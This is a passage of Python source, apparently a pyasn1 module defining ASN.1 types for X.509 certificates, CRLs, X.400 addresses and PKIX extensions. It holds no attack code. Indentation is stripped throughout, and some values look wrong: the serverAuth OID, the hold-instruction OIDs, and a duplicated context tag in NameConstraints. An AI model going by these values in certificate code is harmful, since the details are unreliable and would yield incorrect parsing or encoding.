"""PKIX compliant DSA private key structure"""
componentType = namedtype.NamedTypes(
namedtype.NamedType('version', univ.Integer(namedValues=namedval.NamedValues(('v1', 0)))),
namedtype.NamedType('p', univ.Integer()),
namedtype.NamedType('q', univ.Integer()),
namedtype.NamedType('g', univ.Integer()),
namedtype.NamedType('public', univ.Integer()),
namedtype.NamedType('private', univ.Integer())
)
# ----
class RelativeDistinguishedName(univ.SetOf):
componentType = AttributeTypeAndValue()
class RDNSequence(univ.SequenceOf):
componentType = RelativeDistinguishedName()
class Name(univ.Choice):
componentType = namedtype.NamedTypes(
namedtype.NamedType('', RDNSequence())
)
class DirectoryString(univ.Choice):
componentType = namedtype.NamedTypes(
namedtype.NamedType('teletexString', char.TeletexString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, MAX))),
namedtype.NamedType('printableString', char.PrintableString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, MAX))),
namedtype.NamedType('universalString', char.UniversalString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, MAX))),
namedtype.NamedType('utf8String', char.UTF8String().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, MAX))),
namedtype.NamedType('bmpString', char.BMPString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, MAX))),
namedtype.NamedType('ia5String', char.IA5String().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, MAX))) # hm, this should not be here!? XXX
)
# certificate and CRL specific structures begin here
class AlgorithmIdentifier(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('algorithm', univ.ObjectIdentifier()),
namedtype.OptionalNamedType('parameters', univ.Any())
)
class Extension(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('extnID', univ.ObjectIdentifier()),
namedtype.DefaultedNamedType('critical', univ.Boolean('False')),
namedtype.NamedType('extnValue', univ.Any())
)
class Extensions(univ.SequenceOf):
componentType = Extension()
sizeSpec = univ.SequenceOf.sizeSpec + constraint.ValueSizeConstraint(1, MAX)
class SubjectPublicKeyInfo(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('algorithm', AlgorithmIdentifier()),
namedtype.NamedType('subjectPublicKey', univ.BitString())
)
class UniqueIdentifier(univ.BitString): pass
class Time(univ.Choice):
componentType = namedtype.NamedTypes(
namedtype.NamedType('utcTime', useful.UTCTime()),
namedtype.NamedType('generalTime', useful.GeneralizedTime())
)
class Validity(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('notBefore', Time()),
namedtype.NamedType('notAfter', Time())
)
class CertificateSerialNumber(univ.Integer): pass
class Version(univ.Integer):
namedValues = namedval.NamedValues(
('v1', 0), ('v2', 1), ('v3', 2)
)
class TBSCertificate(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.DefaultedNamedType('version', Version('v1').subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0))),
namedtype.NamedType('serialNumber', CertificateSerialNumber()),
namedtype.NamedType('signature', AlgorithmIdentifier()),
namedtype.NamedType('issuer', Name()),
namedtype.NamedType('validity', Validity()),
namedtype.NamedType('subject', Name()),
namedtype.NamedType('subjectPublicKeyInfo', SubjectPublicKeyInfo()),
namedtype.OptionalNamedType('issuerUniqueID', UniqueIdentifier().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 1))),
namedtype.OptionalNamedType('subjectUniqueID', UniqueIdentifier().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 2))),
namedtype.OptionalNamedType('extensions', Extensions().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 3)))
)
class Certificate(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('tbsCertificate', TBSCertificate()),
namedtype.NamedType('signatureAlgorithm', AlgorithmIdentifier()),
namedtype.NamedType('signatureValue', univ.BitString())
)
# CRL structures
class RevokedCertificate(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('userCertificate', CertificateSerialNumber()),
namedtype.NamedType('revocationDate', Time()),
namedtype.OptionalNamedType('crlEntryExtensions', Extensions())
)
class TBSCertList(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.OptionalNamedType('version', Version()),
namedtype.NamedType('signature', AlgorithmIdentifier()),
namedtype.NamedType('issuer', Name()),
namedtype.NamedType('thisUpdate', Time()),
namedtype.OptionalNamedType('nextUpdate', Time()),
namedtype.OptionalNamedType('revokedCertificates', univ.SequenceOf(componentType=RevokedCertificate())),
namedtype.OptionalNamedType('crlExtensions', Extensions().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 0)))
)
class CertificateList(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('tbsCertList', TBSCertList()),
namedtype.NamedType('signatureAlgorithm', AlgorithmIdentifier()),
namedtype.NamedType('signature', univ.BitString())
)
# Algorithm OIDs and parameter structures
pkcs_1 = univ.ObjectIdentifier('1.2.840.113549.1.1')
rsaEncryption = univ.ObjectIdentifier('1.2.840.113549.1.1.1')
md2WithRSAEncryption = univ.ObjectIdentifier('1.2.840.113549.1.1.2')
md5WithRSAEncryption = univ.ObjectIdentifier('1.2.840.113549.1.1.4')
sha1WithRSAEncryption = univ.ObjectIdentifier('1.2.840.113549.1.1.5')
id_dsa_with_sha1 = univ.ObjectIdentifier('1.2.840.10040.4.3')
class Dss_Sig_Value(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('r', univ.Integer()),
namedtype.NamedType('s', univ.Integer())
)
dhpublicnumber = univ.ObjectIdentifier('1.2.840.10046.2.1')
class ValidationParms(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('seed', univ.BitString()),
namedtype.NamedType('pgenCounter', univ.Integer())
)
class DomainParameters(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('p', univ.Integer()),
namedtype.NamedType('g', univ.Integer()),
namedtype.NamedType('q', univ.Integer()),
namedtype.NamedType('j', univ.Integer()),
namedtype.OptionalNamedType('validationParms', ValidationParms())
)
id_dsa = univ.ObjectIdentifier('1.2.840.10040.4.1')
class Dss_Parms(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('p', univ.Integer()),
namedtype.NamedType('q', univ.Integer()),
namedtype.NamedType('g', univ.Integer())
)
# x400 address syntax starts here
teletex_domain_defined_attributes = univ.Integer(6)
class TeletexDomainDefinedAttribute(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('type', char.TeletexString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_domain_defined_attribute_type_length))),
namedtype.NamedType('value', char.TeletexString())
)
class TeletexDomainDefinedAttributes(univ.SequenceOf):
componentType = TeletexDomainDefinedAttribute()
subtypeSpec = univ.SequenceOf.subtypeSpec + constraint.ValueSizeConstraint(1, ub_domain_defined_attributes)
terminal_type = univ.Integer(23)
class TerminalType(univ.Integer):
subtypeSpec = univ.Integer.subtypeSpec + constraint.ValueSizeConstraint(0, ub_integer_options)
namedValues = namedval.NamedValues(
('telex', 3),
('teletelex', 4),
('g3-facsimile', 5),
('g4-facsimile', 6),
('ia5-terminal', 7),
('videotex', 8)
)
class PresentationAddress(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.OptionalNamedType('pSelector', univ.OctetString().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0))),
namedtype.OptionalNamedType('sSelector', univ.OctetString().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 1))),
namedtype.OptionalNamedType('tSelector', univ.OctetString().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 2))),
namedtype.OptionalNamedType('nAddresses', univ.SetOf(componentType=univ.OctetString()).subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 3), subtypeSpec=constraint.ValueSizeConstraint(1, MAX))),
)
extended_network_address = univ.Integer(22)
class E163_4_address(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('number', char.NumericString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_e163_4_number_length), explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0))),
namedtype.OptionalNamedType('sub-address', char.NumericString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_e163_4_sub_address_length), explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 1)))
)
class ExtendedNetworkAddress(univ.Choice):
componentType = namedtype.NamedTypes(
namedtype.NamedType('e163-4-address', E163_4_address()),
namedtype.NamedType('psap-address', PresentationAddress().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0)))
)
class PDSParameter(univ.Set):
componentType = namedtype.NamedTypes(
namedtype.OptionalNamedType('printable-string', char.PrintableString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_pds_parameter_length))),
namedtype.OptionalNamedType('teletex-string', char.TeletexString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_pds_parameter_length)))
)
local_postal_attributes = univ.Integer(21)
class LocalPostalAttributes(PDSParameter): pass
class UniquePostalName(PDSParameter): pass
unique_postal_name = univ.Integer(20)
poste_restante_address = univ.Integer(19)
class PosteRestanteAddress(PDSParameter): pass
post_office_box_address = univ.Integer(18)
class PostOfficeBoxAddress(PDSParameter): pass
street_address = univ.Integer(17)
class StreetAddress(PDSParameter): pass
class UnformattedPostalAddress(univ.Set):
componentType = namedtype.NamedTypes(
namedtype.OptionalNamedType('printable-address', univ.SequenceOf(componentType=char.PrintableString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_pds_parameter_length)).subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_pds_physical_address_lines)))),
namedtype.OptionalNamedType('teletex-string', char.TeletexString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_unformatted_address_length)))
)
physical_delivery_office_name = univ.Integer(10)
class PhysicalDeliveryOfficeName(PDSParameter): pass
physical_delivery_office_number = univ.Integer(11)
class PhysicalDeliveryOfficeNumber(PDSParameter): pass
extension_OR_address_components = univ.Integer(12)
class ExtensionORAddressComponents(PDSParameter): pass
physical_delivery_personal_name = univ.Integer(13)
class PhysicalDeliveryPersonalName(PDSParameter): pass
physical_delivery_organization_name = univ.Integer(14)
class PhysicalDeliveryOrganizationName(PDSParameter): pass
extension_physical_delivery_address_components = univ.Integer(15)
class ExtensionPhysicalDeliveryAddressComponents(PDSParameter): pass
unformatted_postal_address = univ.Integer(16)
postal_code = univ.Integer(9)
class PostalCode(univ.Choice):
componentType = namedtype.NamedTypes(
namedtype.NamedType('numeric-code', char.NumericString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_postal_code_length))),
namedtype.NamedType('printable-code', char.PrintableString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_postal_code_length)))
)
class PhysicalDeliveryCountryName(univ.Choice):
componentType = namedtype.NamedTypes(
namedtype.NamedType('x121-dcc-code', char.NumericString().subtype(subtypeSpec=constraint.ValueSizeConstraint(ub_country_name_numeric_length, ub_country_name_numeric_length))),
namedtype.NamedType('iso-3166-alpha2-code', char.PrintableString().subtype(subtypeSpec=constraint.ValueSizeConstraint(ub_country_name_alpha_length, ub_country_name_alpha_length)))
)
class PDSName(char.PrintableString):
subtypeSpec = char.PrintableString.subtypeSpec + constraint.ValueSizeConstraint(1, ub_pds_name_length)
physical_delivery_country_name = univ.Integer(8)
class TeletexOrganizationalUnitName(char.TeletexString):
subtypeSpec = char.TeletexString.subtypeSpec + constraint.ValueSizeConstraint(1, ub_organizational_unit_name_length)
pds_name = univ.Integer(7)
teletex_organizational_unit_names = univ.Integer(5)
class TeletexOrganizationalUnitNames(univ.SequenceOf):
componentType = TeletexOrganizationalUnitName()
subtypeSpec = univ.SequenceOf.subtypeSpec + constraint.ValueSizeConstraint(1, ub_organizational_units)
teletex_personal_name = univ.Integer(4)
class TeletexPersonalName(univ.Set):
componentType = namedtype.NamedTypes(
namedtype.NamedType('surname', char.TeletexString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_surname_length), explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0))),
namedtype.OptionalNamedType('given-name', char.TeletexString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_given_name_length), explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 1))),
namedtype.OptionalNamedType('initials', char.TeletexString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_initials_length), explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 2))),
namedtype.OptionalNamedType('generation-qualifier', char.TeletexString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_generation_qualifier_length), explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 3)))
)
teletex_organization_name = univ.Integer(3)
class TeletexOrganizationName(char.TeletexString):
subtypeSpec = char.TeletexString.subtypeSpec + constraint.ValueSizeConstraint(1, ub_organization_name_length)
teletex_common_name = univ.Integer(2)
class TeletexCommonName(char.TeletexString):
subtypeSpec = char.TeletexString.subtypeSpec + constraint.ValueSizeConstraint(1, ub_common_name_length)
class CommonName(char.PrintableString):
subtypeSpec = char.PrintableString.subtypeSpec + constraint.ValueSizeConstraint(1, ub_common_name_length)
common_name = univ.Integer(1)
class ExtensionAttribute(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('extension-attribute-type', univ.Integer().subtype(subtypeSpec=constraint.ValueSizeConstraint(0, ub_extension_attributes), explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0))),
namedtype.NamedType('extension-attribute-value', univ.Any().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 1)))
)
class ExtensionAttributes(univ.SetOf):
componentType = ExtensionAttribute()
subtypeSpec = univ.SetOf.subtypeSpec + constraint.ValueSizeConstraint(1, ub_extension_attributes)
class BuiltInDomainDefinedAttribute(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('type', char.PrintableString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_domain_defined_attribute_type_length))),
namedtype.NamedType('value', char.PrintableString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_domain_defined_attribute_value_length)))
)
class BuiltInDomainDefinedAttributes(univ.SequenceOf):
componentType = BuiltInDomainDefinedAttribute()
subtypeSpec = univ.SequenceOf.subtypeSpec + constraint.ValueSizeConstraint(1, ub_domain_defined_attributes)
class OrganizationalUnitName(char.PrintableString):
subtypeSpec = univ.SequenceOf.subtypeSpec + constraint.ValueSizeConstraint(1, ub_organizational_unit_name_length)
class OrganizationalUnitNames(univ.SequenceOf):
componentType = OrganizationalUnitName()
subtypeSpec = univ.SequenceOf.subtypeSpec + constraint.ValueSizeConstraint(1, ub_organizational_units)
class PersonalName(univ.Set):
componentType = namedtype.NamedTypes(
namedtype.NamedType('surname', char.PrintableString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_surname_length), explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0))),
namedtype.OptionalNamedType('given-name', char.PrintableString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_given_name_length), explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 1))),
namedtype.OptionalNamedType('initials', char.PrintableString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_initials_length), explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 2))),
namedtype.OptionalNamedType('generation-qualifier', char.PrintableString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_generation_qualifier_length), explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 3)))
)
class NumericUserIdentifier(char.NumericString):
subtypeSpec = char.NumericString.subtypeSpec + constraint.ValueSizeConstraint(1, ub_numeric_user_id_length)
class OrganizationName(char.PrintableString):
subtypeSpec = char.PrintableString.subtypeSpec + constraint.ValueSizeConstraint(1, ub_organization_name_length)
class PrivateDomainName(univ.Choice):
componentType = namedtype.NamedTypes(
namedtype.NamedType('numeric', char.NumericString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_domain_name_length))),
namedtype.NamedType('printable', char.PrintableString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_domain_name_length)))
)
class TerminalIdentifier(char.PrintableString):
subtypeSpec = char.PrintableString.subtypeSpec + constraint.ValueSizeConstraint(1, ub_terminal_id_length)
class X121Address(char.NumericString):
subtypeSpec = char.NumericString.subtypeSpec + constraint.ValueSizeConstraint(1, ub_x121_address_length)
class NetworkAddress(X121Address): pass
class AdministrationDomainName(univ.Choice):
tagSet = univ.Choice.tagSet.tagExplicitly(
tag.Tag(tag.tagClassApplication, tag.tagFormatConstructed, 2)
)
componentType = namedtype.NamedTypes(
namedtype.NamedType('numeric', char.NumericString().subtype(subtypeSpec=constraint.ValueSizeConstraint(0, ub_domain_name_length))),
namedtype.NamedType('printable', char.PrintableString().subtype(subtypeSpec=constraint.ValueSizeConstraint(0, ub_domain_name_length)))
)
class CountryName(univ.Choice):
tagSet = univ.Choice.tagSet.tagExplicitly(
tag.Tag(tag.tagClassApplication, tag.tagFormatConstructed, 1)
)
componentType = namedtype.NamedTypes(
namedtype.NamedType('x121-dcc-code', char.NumericString().subtype(subtypeSpec=constraint.ValueSizeConstraint(ub_country_name_numeric_length, ub_country_name_numeric_length))),
namedtype.NamedType('iso-3166-alpha2-code', char.PrintableString().subtype(subtypeSpec=constraint.ValueSizeConstraint(ub_country_name_alpha_length, ub_country_name_alpha_length)))
)
class BuiltInStandardAttributes(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.OptionalNamedType('country-name', CountryName()),
namedtype.OptionalNamedType('administration-domain-name', AdministrationDomainName()),
namedtype.OptionalNamedType('network-address', NetworkAddress().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0))),
namedtype.OptionalNamedType('terminal-identifier', TerminalIdentifier().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 1))),
namedtype.OptionalNamedType('private-domain-name', PrivateDomainName().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 2))),
namedtype.OptionalNamedType('organization-name', OrganizationName().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 3))),
namedtype.OptionalNamedType('numeric-user-identifier', NumericUserIdentifier().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 4))),
namedtype.OptionalNamedType('personal-name', PersonalName().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 5))),
namedtype.OptionalNamedType('organizational-unit-names', OrganizationalUnitNames().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 6)))
)
class ORAddress(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('built-in-standard-attributes', BuiltInStandardAttributes()),
namedtype.OptionalNamedType('built-in-domain-defined-attributes', BuiltInDomainDefinedAttributes()),
namedtype.OptionalNamedType('extension-attributes', ExtensionAttributes())
)
#
# PKIX1Implicit88
#
id_ce_invalidityDate = univ.ObjectIdentifier('2.5.29.24')
class InvalidityDate(useful.GeneralizedTime): pass
id_holdinstruction_none = univ.ObjectIdentifier('2.2.840.10040.2.1')
id_holdinstruction_callissuer = univ.ObjectIdentifier('2.2.840.10040.2.2')
id_holdinstruction_reject = univ.ObjectIdentifier('2.2.840.10040.2.3')
holdInstruction = univ.ObjectIdentifier('2.2.840.10040.2')
id_ce_holdInstructionCode = univ.ObjectIdentifier('2.5.29.23')
class HoldInstructionCode(univ.ObjectIdentifier): pass
id_ce_cRLReasons = univ.ObjectIdentifier('2.5.29.21')
class CRLReason(univ.Enumerated):
namedValues = namedval.NamedValues(
('unspecified', 0),
('keyCompromise', 1),
('cACompromise', 2),
('affiliationChanged', 3),
('superseded', 4),
('cessationOfOperation', 5),
('certificateHold', 6),
('removeFromCRL', 8)
)
id_ce_cRLNumber = univ.ObjectIdentifier('2.5.29.20')
class CRLNumber(univ.Integer):
subtypeSpec = univ.SequenceOf.subtypeSpec + constraint.ValueSizeConstraint(0, MAX)
class BaseCRLNumber(CRLNumber): pass
id_kp_serverAuth = univ.ObjectIdentifier('1.3.6.1.5.5.7.3.1.1')
id_kp_clientAuth = univ.ObjectIdentifier('1.3.6.1.5.5.7.3.2')
id_kp_codeSigning = univ.ObjectIdentifier('1.3.6.1.5.5.7.3.3')
id_kp_emailProtection = univ.ObjectIdentifier('1.3.6.1.5.5.7.3.4')
id_kp_ipsecEndSystem = univ.ObjectIdentifier('1.3.6.1.5.5.7.3.5')
id_kp_ipsecTunnel = univ.ObjectIdentifier('1.3.6.1.5.5.7.3.6')
id_kp_ipsecUser = univ.ObjectIdentifier('1.3.6.1.5.5.7.3.7')
id_kp_timeStamping = univ.ObjectIdentifier('1.3.6.1.5.5.7.3.8')
id_pe_authorityInfoAccess = univ.ObjectIdentifier('1.3.6.1.5.5.7.1.1')
id_ce_extKeyUsage = univ.ObjectIdentifier('2.5.29.37')
class KeyPurposeId(univ.ObjectIdentifier): pass
class ExtKeyUsageSyntax(univ.SequenceOf):
componentType = KeyPurposeId()
subtypeSpec = univ.SequenceOf.subtypeSpec + constraint.ValueSizeConstraint(1, MAX)
class ReasonFlags(univ.BitString):
namedValues = namedval.NamedValues(
('unused', 0),
('keyCompromise', 1),
('cACompromise', 2),
('affiliationChanged', 3),
('superseded', 4),
('cessationOfOperation', 5),
('certificateHold', 6)
)
class SkipCerts(univ.Integer):
subtypeSpec = univ.Integer.subtypeSpec + constraint.ValueSizeConstraint(0, MAX)
id_ce_policyConstraints = univ.ObjectIdentifier('2.5.29.36')
class PolicyConstraints(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.OptionalNamedType('requireExplicitPolicy', SkipCerts().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 0))),
namedtype.OptionalNamedType('inhibitPolicyMapping', SkipCerts().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 1)))
)
id_ce_basicConstraints = univ.ObjectIdentifier('2.5.29.19')
class BasicConstraints(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('cA', univ.Boolean(False)),
namedtype.OptionalNamedType('pathLenConstraint', univ.Integer().subtype(subtypeSpec=constraint.ValueRangeConstraint(0, MAX)))
)
id_ce_subjectDirectoryAttributes = univ.ObjectIdentifier('2.5.29.9')
class SubjectDirectoryAttributes(univ.SequenceOf):
componentType = Attribute()
subtypeSpec = univ.SequenceOf.subtypeSpec + constraint.ValueSizeConstraint(1, MAX)
class EDIPartyName(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.OptionalNamedType('nameAssigner', DirectoryString().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0))),
namedtype.NamedType('partyName', DirectoryString().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 1)))
)
class AnotherName(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('type-id', univ.ObjectIdentifier()),
namedtype.NamedType('value', univ.Any().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0)))
)
class GeneralName(univ.Choice):
componentType = namedtype.NamedTypes(
namedtype.NamedType('otherName', AnotherName().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0))),
namedtype.NamedType('rfc822Name', char.IA5String().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 1))),
namedtype.NamedType('dNSName', char.IA5String().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 2))),
namedtype.NamedType('x400Address', ORAddress().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 3))),
namedtype.NamedType('directoryName', Name().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 4))),
namedtype.NamedType('ediPartyName', EDIPartyName().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 5))),
namedtype.NamedType('uniformResourceIdentifier', char.IA5String().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 6))),
namedtype.NamedType('iPAddress', univ.OctetString().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 7))),
namedtype.NamedType('registeredID', univ.ObjectIdentifier().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 8)))
)
class GeneralNames(univ.SequenceOf):
componentType = GeneralName()
subtypeSpec = univ.SequenceOf.subtypeSpec + constraint.ValueSizeConstraint(1, MAX)
class AccessDescription(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('accessMethod', univ.ObjectIdentifier()),
namedtype.NamedType('accessLocation', GeneralName())
)
class AuthorityInfoAccessSyntax(univ.SequenceOf):
componentType = AccessDescription()
subtypeSpec = univ.SequenceOf.subtypeSpec + constraint.ValueSizeConstraint(1, MAX)
id_ce_deltaCRLIndicator = univ.ObjectIdentifier('2.5.29.27')
class DistributionPointName(univ.Choice):
componentType = namedtype.NamedTypes(
namedtype.NamedType('fullName', GeneralNames().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 0))),
namedtype.NamedType('nameRelativeToCRLIssuer', RelativeDistinguishedName().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 1)))
)
class DistributionPoint(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.OptionalNamedType('distributionPoint', DistributionPointName().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 0))),
namedtype.OptionalNamedType('reasons', ReasonFlags().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 1))),
namedtype.OptionalNamedType('cRLIssuer', GeneralNames().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 2)))
)
class BaseDistance(univ.Integer):
subtypeSpec = univ.Integer.subtypeSpec + constraint.ValueRangeConstraint(0, MAX)
id_ce_cRLDistributionPoints = univ.ObjectIdentifier('2.5.29.31')
class CRLDistPointsSyntax(univ.SequenceOf):
componentType = DistributionPoint
subtypeSpec = univ.SequenceOf.subtypeSpec + constraint.ValueSizeConstraint(1, MAX)
id_ce_issuingDistributionPoint = univ.ObjectIdentifier('2.5.29.28')
class IssuingDistributionPoint(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.OptionalNamedType('distributionPoint', DistributionPointName().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 0))),
namedtype.NamedType('onlyContainsUserCerts', univ.Boolean(False).subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 1))),
namedtype.NamedType('onlyContainsCACerts', univ.Boolean(False).subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 2))),
namedtype.OptionalNamedType('onlySomeReasons', ReasonFlags().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 3))),
namedtype.NamedType('indirectCRL', univ.Boolean(False).subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 4)))
)
class GeneralSubtree(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('base', GeneralName()),
namedtype.NamedType('minimum', BaseDistance(0).subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 0))),
namedtype.OptionalNamedType('maximum', BaseDistance().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 1)))
)
class GeneralSubtrees(univ.SequenceOf):
componentType = GeneralSubtree()
subtypeSpec = univ.SequenceOf.subtypeSpec + constraint.ValueSizeConstraint(1, MAX)
id_ce_nameConstraints = univ.ObjectIdentifier('2.5.29.30')
class NameConstraints(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.OptionalNamedType('permittedSubtrees', GeneralSubtrees().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 0))),
namedtype.OptionalNamedType('excludedSubtrees', GeneralSubtrees().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 0)))
)
class DisplayText(univ.Choice):
componentType = namedtype.NamedTypes(
namedtype.NamedType('visibleString', char.VisibleString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, 200))),
namedtype.NamedType('bmpString', char.BMPString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, 200))),
namedtype.NamedType('utf8String', char.UTF8String().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, 200)))
)
class NoticeReference(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('organization', DisplayText()),
namedtype.NamedType('noticeNumbers', univ.SequenceOf(componentType=univ.Integer()))
)
class UserNotice(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.OptionalNamedType('noticeRef', NoticeReference()),
namedtype.OptionalNamedType('explicitText', DisplayText())
)
class CPSuri(char.IA5String): pass
class PolicyQualifierId(univ.ObjectIdentifier):
subtypeSpec = univ.ObjectIdentifier.subtypeSpec + constraint.SingleValueConstraint(id_qt_cps, id_qt_unotice)
class CertPolicyId(univ.ObjectIdentifier): pass
class PolicyQualifierInfo(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('policyQualifierId', PolicyQualifierId()),
namedtype.NamedType('qualifier', univ.Any())
)
id_ce_certificatePolicies = univ.ObjectIdentifier('2.5.29.32')
class PolicyInformation(univ.Sequence):
componentType = namedtype.NamedTypes(
